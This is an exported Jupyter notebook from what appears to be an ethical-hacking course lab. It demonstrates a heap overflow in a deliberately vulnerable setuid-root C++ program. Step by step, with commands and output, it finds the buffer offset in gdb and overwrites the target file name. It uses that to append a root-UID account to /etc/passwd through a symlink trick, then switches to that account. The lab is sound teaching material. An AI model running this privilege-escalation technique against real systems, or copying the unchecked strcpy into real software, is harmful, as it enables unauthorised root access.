# Heap Overflow

- buffer overflow can happen in other segments such as **heap**, **data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
    
## Heap Overflow
- heap overflow may not be as common as stack overflow but can be just as effective

### demos/heap_overflow/secret.cpp
- review the program and spot the following line that's susceptible 
```c++
strcpy(secret, argv[1]); // culprit!
```

In [2]:
%cd demos/heap_overflow

/home/kali/projects/EthicalHacking/demos/heap_overflow


In [3]:
%pwd

'/home/kali/projects/EthicalHacking/demos/heap_overflow'

In [4]:
! cat secret.cpp

#include <iostream>
#include <string>
#include <cstdio>
#include <cstring>
#include <fstream>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()
#include <filesystem>

namespace fs = std::filesystem;
using namespace std;

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <secret to add to %s>\n", prog_name, filename);
   exit(0);
}

int main(int argc, char* argv[]) {
    int userid;
    char *secret, *secret_file;
    ofstream fout;
    
    secret = new char[100];
    secret_file = new char[20];


    strcpy(secret_file, "/var/secret");

    if (argc < 2)
        usage(argv[0], secret_file);
    
    strcpy(secret, argv[1]);

    printf("[DEBUG] secret      @ %p: \'%s\'\n", secret, secret);
    printf("[DEBUG] secret_file @ %p: \'%s\'\n", secret_file, secret_file);

    userid = getuid();
    fout.open(secret_file, ios_base::app); // append mode
    if (!fout) {
        cerr << "Error while opening file\n";
        cerr << "Make sure " << argv[0] << " h

In [5]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -m32 -std=c++17 -fno-stack-protector -z execstack -no-pie secret.cpp  -o secret.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
sudo chown root:root secret.exe 
sudo chmod +s secret.exe  


### secret.exe must be setuid root program 
- all users in the system can keep their own secret by writing to /var/secrets file

In [8]:
! ls -al secret.exe

-rwsr-sr-x 1 root root 215784 Jul 23 14:41 secret.exe


In [9]:
# run the program
! ./secret.exe

Usage: ./secret.exe <secret to add to /var/secret>


In [10]:
# run the program with argument
! ./secret.exe "my top secret data"

[DEBUG] secret      @ 0x8051bb0: 'my top secret data'
[DEBUG] secret_file @ 0x8051c20: '/var/secret'
Secret saved.


In [11]:
! ./secret.exe "new note for user"

[DEBUG] secret      @ 0x8051bb0: 'new note for user'
[DEBUG] secret_file @ 0x8051c20: '/var/secret'
Secret saved.


In [12]:
! echo kali | sudo -S cat /var/secret

[sudo] password for kali: 1000
my top secret data
1000
new note for user
1001
another secret
1000
more secret
1000
my top secret data
1000
my top secret data
1000
new note for user


## overflowing buffer by corrupting datafile
- how far down is secret_file from secret buffer (the offset)?
- use gdb
- subtract the address of secret buffer from the address of scret_file

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow]
└─$ sudo gdb -q ./secret.exe 
Reading symbols from ./secret.exe...

(gdb) break main
Breakpoint 1 at 0x804936a: file secret.cpp, line 21.

(gdb) run "some secret"
Starting program: /home/kali/projects/EthicalHacking/demos/heap_overflow/secret.exe "some secret"

Breakpoint 1, main (argc=2, argv=0xffffd614) at secret.cpp:21
21          ofstream fout;

(gdb) n
(gdb) n 
(gdb) p/x secret # secret is a pointer
$1 = 0x8051bb0

(gdb) p/x secret_file # secret file is a pointer
$2 = 0x8051c20
(gdb) 
```

In [17]:
# the offset of secret_file from secret buffer is:
print(0x8051c20 - 0x8051bb0)

112


In [46]:
! ./secret.exe $(python -c 'print("A"*112)')

[DEBUG] secret      @ 0x8051bb0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] secret_file @ 0x8051c20: ''
Error while opening file
Make sure ./secret.exe has r/w permission to /var folder


In [49]:
# let's make sure testfile doesn't exist in the current director
# delete the file if exists
#! rm -f testfile
! ls -al testfile

ls: cannot access 'testfile': No such file or directory


In [50]:
! ./secret.exe $(python -c 'print("A"*112 + "testfile")')

[DEBUG] secret      @ 0x8051bb0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile'
[DEBUG] secret_file @ 0x8051c20: 'testfile'
Secret saved.
double free or corruption (out)


In [51]:
%%bash
ls -al testfile

-rw------- 1 root root 126 Jul 23 16:28 testfile


In [22]:
%%bash
echo kali | sudo -S cat testfile

1000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile


[sudo] password for kali: 

## Exploit the heap overflow flaw
- several clever ways to exploit this type of capability
- One interesting one: append a user account to the `/etc/passwd` file
- make a backup copy of the file just incase...

In [24]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [25]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/us

## /etc/passwd file format

- Linux `/etc/passwd` file stores user account infor and hashed password using the following format:

`username:password:userid:groupid:User Info:home folder:default shell`

- x : hashed password stored in /etc/shadow file
- NOTE: the password field can also contain hashed password
- Python crypt module provides API to create Unix passwords with hash - [https://docs.python.org/3/library/crypt.html](https://docs.python.org/3/library/crypt.html)

```python
crypt("password", "salt")
```

In [26]:
%%bash
python -c 'import crypt; print(crypt.crypt("password", "AA"))'

AA6tQYSfGxd/A


In [27]:
%%bash
python -c 'import crypt; print(crypt.crypt("password", "XX"))'

XXq2wKiyI43A2


## goal: generate a string that looks like

`username:XXq2wKiyI43A2:0:0:userinfo:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with `/bin/bash`
    - because the file name `/etc/passwd` will be automatically attached at the end
    - remember we're writing the whole string as a secret note to the file

### workaround:
- make `/etc/passwd` a soft link pointing to `/bin/bash`
- create the following string instead:

`username:XXq2wKiyI43A2:0:0:userinfo:/root:/tmp/etc/passwd`

- Note `/etc/passwd` must be over_written to the `secret_file` buffer

In [28]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [29]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 kali kali 9 Jul 23 15:48 /tmp/etc/passwd -> /bin/bash


### now we can create a valid password entry that looks like:

`hacker1:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### things to note
- the value just before `/etc/passwd` must be 112 bytes long, remember?
- can play with user information column to adjust the length

In [36]:
%%bash
# find the length with empty user info
python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")'

hacker1:XXq2wKiyI43A2:0:0::/root:/tmp

In [38]:
%%bash
# find the length with empty user info
python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' | wc -c

37


In [39]:
112-37

75

In [40]:
%%bash
python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp", end="")' | wc -c

112


In [52]:
! ./secret.exe $(python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")')

[DEBUG] secret      @ 0x8051bb0: 'hacker1:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd'
[DEBUG] secret_file @ 0x8051c20: '/etc/passwd'
Secret saved.
munmap_chunk(): invalid pointer


In [44]:
%%bash
echo kali | sudo -S tail /etc/passwd

lightdm:x:131:139:Light Display Manager:/var/lib/lightdm:/bin/false
king-phisher:x:132:140::/var/lib/king-phisher:/usr/sbin/nologin
kali:x:1000:1000:kali,,,:/home/kali:/usr/bin/zsh
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
1000
letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd
user:x:1001:1001:user user,,,:/home/user:/bin/bash
nxpgsql:x:1002:1002:NeXpose PostgreSQL User:/opt/rapid7/nexpose/nsc/nxpgsql:/bin/sh
1000
hacker1:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd


[sudo] password for kali: 

## login or su 
- use newly created account (`hacker1:password`) to login

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow]
└─$ su hacker1                                                                                        134 ⨯
Password: 
┌──(root💀K)-[/home/kali/projects/EthicalHacking/demos/heap_overflow]
└─# whomai         
```